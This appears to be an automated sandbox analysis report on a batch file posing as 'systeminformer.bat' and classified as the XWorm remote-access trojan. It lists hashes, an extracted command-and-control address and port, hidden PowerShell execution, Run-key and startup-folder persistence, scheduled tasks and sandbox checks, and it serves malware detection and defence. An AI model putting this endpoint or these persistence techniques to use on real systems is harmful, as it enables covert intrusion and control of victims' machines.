Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
27/06/2024, 07:31
Static task
static1
Behavioral task
behavioral1
Sample
systeminformer.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
systeminformer.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
systeminformer.bat
Resource
win11-20240419-en
General
-
Target
systeminformer.bat
-
Size
408KB
-
MD5
34d172bddcf176f4a3c85f2b8083850c
-
SHA1
6e4fd033d2ed62b464db43b6af1f5bb0e9283a46
-
SHA256
ecb640f4a29fea8d3fb020aa2b41bdc446703c4b1ede6b5c72621229b270bf42
-
SHA512
c52171f7c68902cfe5da18b2a76a59c5a27f1cec92ee330f57f18f9b257079b49d5ff445f4251ad13ba5886e274d5286e062c39cac3a77bbef71909502ab3516
-
SSDEEP
12288:z4MdFDVqDtPSt2dbWRZpti8C6lhzFAxsbmC:z4UoSCAjti8C6l9eHC
Malware Config
Extracted
xworm
case-shield.gl.at.ply.gg:26501
-
Install_directory
%Userprofile%
-
install_file
system.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/816-169-0x000002337CFB0000-0x000002337CFCA000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 2 816 powershell.exe 6 816 powershell.exe 8 816 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 4436 powershell.exe 3020 powershell.exe 816 powershell.exe 2312 powershell.exe 2572 powershell.exe 5028 powershell.exe 4780 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 4540 system.exe 948 system.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\system svchost.exe File created C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-27-07-33-23.etl svchost.exe File opened for modification C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-27-07-33-23.etl svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx svchost.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\2717123927\1590785016.pri Explorer.EXE File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 47 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5a00310000000000db58193c100053797374656d33320000420009000400efbe724a0b5ddb58193c2e0000002f0f0000000001000000000000000000000000000000cf0d2101530079007300740065006d0033003200000018000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 56003100000000008458a364100057696e646f777300400009000400efbe724a0b5d8458a3642e0000006b0500000000010000000000000000000000000000005e51ee00570069006e0064006f0077007300000016000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1492 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3320 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4436 powershell.exe 4436 powershell.exe 4436 powershell.exe 3020 powershell.exe 3020 powershell.exe 3020 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 2312 powershell.exe 2312 powershell.exe 2312 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 2572 powershell.exe 2572 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 2572 powershell.exe 5028 powershell.exe 5028 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 5028 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 4780 powershell.exe 4780 powershell.exe 4780 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe 816 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3320 Explorer.EXE 3376 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
pid Process 840 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeIncreaseQuotaPrivilege 3020 powershell.exe Token: SeSecurityPrivilege 3020 powershell.exe Token: SeTakeOwnershipPrivilege 3020 powershell.exe Token: SeLoadDriverPrivilege 3020 powershell.exe Token: SeSystemProfilePrivilege 3020 powershell.exe Token: SeSystemtimePrivilege 3020 powershell.exe Token: SeProfSingleProcessPrivilege 3020 powershell.exe Token: SeIncBasePriorityPrivilege 3020 powershell.exe Token: SeCreatePagefilePrivilege 3020 powershell.exe Token: SeBackupPrivilege 3020 powershell.exe Token: SeRestorePrivilege 3020 powershell.exe Token: SeShutdownPrivilege 3020 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeSystemEnvironmentPrivilege 3020 powershell.exe Token: SeRemoteShutdownPrivilege 3020 powershell.exe Token: SeUndockPrivilege 3020 powershell.exe Token: SeManageVolumePrivilege 3020 powershell.exe Token: 33 3020 powershell.exe Token: 34 3020 powershell.exe Token: 35 3020 powershell.exe Token: 36 3020 powershell.exe Token: SeIncreaseQuotaPrivilege 3020 powershell.exe Token: SeSecurityPrivilege 3020 powershell.exe Token: SeTakeOwnershipPrivilege 3020 powershell.exe Token: SeLoadDriverPrivilege 3020 powershell.exe Token: SeSystemProfilePrivilege 3020 powershell.exe Token: SeSystemtimePrivilege 3020 powershell.exe Token: SeProfSingleProcessPrivilege 3020 powershell.exe Token: SeIncBasePriorityPrivilege 3020 powershell.exe Token: SeCreatePagefilePrivilege 3020 powershell.exe Token: SeBackupPrivilege 3020 powershell.exe Token: SeRestorePrivilege 3020 powershell.exe Token: SeShutdownPrivilege 3020 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeSystemEnvironmentPrivilege 3020 powershell.exe Token: SeRemoteShutdownPrivilege 3020 powershell.exe Token: SeUndockPrivilege 3020 powershell.exe Token: SeManageVolumePrivilege 3020 powershell.exe Token: 33 3020 powershell.exe Token: 34 3020 powershell.exe Token: 35 3020 powershell.exe Token: 36 3020 powershell.exe Token: SeIncreaseQuotaPrivilege 3020 powershell.exe Token: SeSecurityPrivilege 3020 powershell.exe Token: SeTakeOwnershipPrivilege 3020 powershell.exe Token: SeLoadDriverPrivilege 3020 powershell.exe Token: SeSystemProfilePrivilege 3020 powershell.exe Token: SeSystemtimePrivilege 3020 powershell.exe Token: SeProfSingleProcessPrivilege 3020 powershell.exe Token: SeIncBasePriorityPrivilege 3020 powershell.exe Token: SeCreatePagefilePrivilege 3020 powershell.exe Token: SeBackupPrivilege 3020 powershell.exe Token: SeRestorePrivilege 3020 powershell.exe Token: SeShutdownPrivilege 3020 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeSystemEnvironmentPrivilege 3020 powershell.exe Token: SeRemoteShutdownPrivilege 3020 powershell.exe Token: SeUndockPrivilege 3020 powershell.exe Token: SeManageVolumePrivilege 3020 powershell.exe Token: 33 3020 powershell.exe Token: 34 3020 powershell.exe Token: 35 3020 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3320 Explorer.EXE 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3320 Explorer.EXE 3320 Explorer.EXE 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3376 taskmgr.exe 3320 Explorer.EXE 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe 3376 taskmgr.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 816 powershell.exe 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4540 wrote to memory of 4428 4540 cmd.exe 74 PID 4540 wrote to memory of 4428 4540 cmd.exe 74 PID 4540 wrote to memory of 4436 4540 cmd.exe 75 PID 4540 wrote to memory of 4436 4540 cmd.exe 75 PID 4436 wrote to memory of 3020 4436 powershell.exe 76 PID 4436 wrote to memory of 3020 4436 powershell.exe 76 PID 4436 wrote to memory of 4112 4436 powershell.exe 79 PID 4436 wrote to memory of 4112 4436 powershell.exe 79 PID 4112 wrote to memory of 4960 4112 WScript.exe 80 PID 4112 wrote to memory of 4960 4112 WScript.exe 80 PID 4960 wrote to memory of 4964 4960 cmd.exe 82 PID 4960 wrote to memory of 4964 4960 cmd.exe 82 PID 4960 wrote to memory of 816 4960 cmd.exe 83 PID 4960 wrote to memory of 816 4960 cmd.exe 83 PID 816 wrote to memory of 3320 816 powershell.exe 54 PID 816 wrote to memory of 1168 816 powershell.exe 20 PID 816 wrote to memory of 2348 816 powershell.exe 42 PID 816 wrote to memory of 1948 816 powershell.exe 35 PID 816 wrote to memory of 1748 816 powershell.exe 32 PID 816 wrote to memory of 1956 816 powershell.exe 36 PID 816 wrote to memory of 3124 816 powershell.exe 53 PID 816 wrote to memory of 2396 816 powershell.exe 43 PID 816 wrote to memory of 2120 816 powershell.exe 38 PID 816 wrote to memory of 772 816 powershell.exe 10 PID 816 wrote to memory of 932 816 powershell.exe 13 PID 816 wrote to memory of 1716 816 powershell.exe 31 PID 816 wrote to memory of 1124 816 powershell.exe 19 PID 816 wrote to memory of 4472 816 powershell.exe 65 PID 816 wrote to memory of 2288 816 powershell.exe 41 PID 816 wrote to memory of 4652 816 powershell.exe 62 PID 816 wrote to memory of 2532 816 powershell.exe 47 PID 816 wrote to memory of 1892 816 powershell.exe 34 PID 816 wrote to memory of 1500 816 powershell.exe 27 PID 816 wrote to memory of 2476 816 powershell.exe 46 PID 816 wrote to memory of 1096 816 powershell.exe 18 PID 816 wrote to memory of 2276 816 powershell.exe 40 PID 816 wrote to memory of 884 816 powershell.exe 12 PID 816 wrote to memory of 1276 816 powershell.exe 24 PID 816 wrote to memory of 2452 816 powershell.exe 45 PID 816 wrote to memory of 1268 816 powershell.exe 23 PID 816 wrote to memory of 1464 816 powershell.exe 26 PID 816 wrote to memory of 4812 816 powershell.exe 60 PID 816 wrote to memory of 1884 816 powershell.exe 33 PID 816 wrote to memory of 2244 816 powershell.exe 39 PID 816 wrote to memory of 1240 816 powershell.exe 22 PID 816 wrote to memory of 1632 816 powershell.exe 30 PID 816 wrote to memory of 840 816 powershell.exe 11 PID 816 wrote to memory of 3004 816 powershell.exe 51 PID 816 wrote to memory of 836 816 powershell.exe 16 PID 816 wrote to memory of 2608 816 powershell.exe 48 PID 816 wrote to memory of 1028 816 powershell.exe 17 PID 816 wrote to memory of 1580 816 powershell.exe 28 PID 816 wrote to memory of 1412 816 powershell.exe 25 PID 816 wrote to memory of 1608 816 powershell.exe 29 PID 816 wrote to memory of 424 816 powershell.exe 15 PID 816 wrote to memory of 4156 816 powershell.exe 63 PID 816 wrote to memory of 1192 816 powershell.exe 21 PID 816 wrote to memory of 2312 816 powershell.exe 84 PID 816 wrote to memory of 2312 816 powershell.exe 84 PID 840 wrote to memory of 216 840 svchost.exe 86 PID 840 wrote to memory of 216 840 svchost.exe 86 PID 816 wrote to memory of 2572 816 powershell.exe 87 PID 816 wrote to memory of 2572 816 powershell.exe 87 PID 816 wrote to memory of 5028 816 powershell.exe 89 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch1⤵
- Drops file in System32 directory
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:216
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca2⤵PID:736
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:5024
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}2⤵PID:3508
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:1936
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵PID:2824
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k rpcss1⤵PID:884
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:932
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:836
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:1028
-
